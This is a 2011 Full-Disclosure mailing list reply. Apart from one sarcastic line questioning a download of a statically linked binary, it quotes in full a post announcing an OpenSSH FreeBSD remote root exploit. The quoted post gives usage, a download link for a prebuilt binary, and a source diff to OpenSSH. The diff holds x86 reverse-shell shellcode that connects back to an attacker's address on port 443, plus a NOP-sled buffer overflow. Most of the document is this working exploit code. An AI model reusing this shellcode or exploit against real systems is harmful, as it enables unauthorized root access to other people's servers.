So you want people to download your statically linked binary? On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH . < [email protected]> wrote:
> OpenSSH FreeBSD Remote Root Exploit > By Kingcope > Year 2011 > > Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 > Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 > run like ./ssh -1 -z <yourip> <target> > setup a netcat, port 443 on yourip first > > a statically linked linux binary of the exploit can be found below > attached is a diff to openssh-5.8p2. > > the statically linked binary can be downloaded from > http://isowarez.de/ssh_0day > > I know these versions are really old, some seem to run > that tough. > > -Cheers, King "the archaeologist" Cope > > diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c > 149a150 > > char *myip; > 195a197,203 > > "OpenSSH FreeBSD Remote Root Exploit\n" > > "By Kingcope\n" > > "Year 2011\n\n" > > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n" > > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n" > > "run like ./ssh -1 -z <yourip> <target>\n" > > "setup a netcat, port 443 on yourip first\n\n" > 299c307 > < while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx" > --- > > while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx" > 335a344,346 > > break; > > case 'z': > > myip = optarg; > diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c > 667a668,719 > > //IP=\xc0\xa8\x20\x80 > > #define IPADDR "\xc0\xa8\x20\x80" > > #define PORT "\x27\x10" /* htons(10000) */ > > > > char sc[] = > > "\x90\x90" > > "\x90\x90" > > "\x31\xc9" // xor ecx, ecx > > "\xf7\xe1" // mul ecx > > "\x51" // push ecx > > "\x41" // inc ecx > > "\x51" // push ecx > > "\x41" // inc ecx > > "\x51" // push ecx > > "\x51" // push ecx > > "\xb0\x61" // mov al, 97 > > "\xcd\x80" // int 80h > > "\x89\xc3" // mov ebx, eax > > "\x68"IPADDR // push dword 0101017fh > > "\x66\x68"PORT // push word 4135 > > "\x66\x51" // push cx > > "\x89\xe6" // mov esi, esp > > "\xb2\x10" // mov dl, 16 > > "\x52" // push edx > > "\x56" // push esi > > "\x50" // push eax > > "\x50" // push eax > > "\xb0\x62" // mov al, 98 > > "\xcd\x80" // int 80h > > "\x41" // inc ecx > > "\xb0\x5a" // mov al, 90 > > "\x49" // dec ecx > > "\x51" // push ecx > > "\x53" // push ebx > > "\x53" // push ebx > > "\xcd\x80" // int 80h > > "\x41" // inc ecx > > "\xe2\xf5" // loop -10 > > "\x51" // push ecx > > "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh > > "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh > > "\x89\xe3" // mov ebx, esp > > "\x51" // push ecx > > "\x54" // push esp > > "\x53" // push ebx > > "\x53" // push ebx > > "\xb0\xc4\x34\xff" > > "\xcd\x80"; // int 80h > > > > > > extern char *myip; > > > 678a731,748 > > > > char buffer[100000]; > > > > printf("OpenSSH Remote Root Exploit\n"); > > printf("By Kingcope\n"); > > printf("Year 2011\n\n"); > > printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"); > > printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"); > > printf("Connect back to: %s:443\n", myip); > > > > *((unsigned long*)(sc + 21)) = inet_addr(myip); > > *((unsigned short*)(sc + 27)) = htons(443); > > > > memset(buffer, 'V', 8096); > > memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 > FreeBSD-20020702 > > memset(buffer+28, '\x90', 65535); > > memcpy(buffer+28+65535, sc, sizeof(sc)); > > server_user=buffer; > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
